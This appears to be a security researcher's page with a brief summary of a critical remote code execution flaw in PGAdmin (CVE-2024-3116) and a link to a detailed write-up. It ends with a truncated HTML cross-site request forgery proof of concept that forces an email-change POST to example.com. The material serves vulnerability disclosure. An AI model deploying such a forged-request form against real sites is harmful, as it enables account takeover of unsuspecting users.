Ayoub ELMOKHTAR aelmokhtar


Critical Remote Code Execution Vulnerability in PGAdmin: Detailed Analysis Report

This report presents a critical Remote Code Execution (RCE) vulnerability within PGAdmin, discovered during a security review. This vulnerability allows attackers to execute arbitrary code on the server hosting PGAdmin, posing a severe risk to both the database management system's integrity and the security of the underlying data.

Check out more technical details at https://ayoubmokhtar.com/post/remote_code_execution_pgadmin_8.4-cve-2024-3116/

<html>
<meta name="referrer" content="unsafe-url">
<body>
<form id="myForm" action="https://example.com/email/change" method="POST" onsubmit="event.preventDefault(); openTabAndSubmit();">
<input type="email" name="email" value="test@test.com" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState("", "", "/?example.com");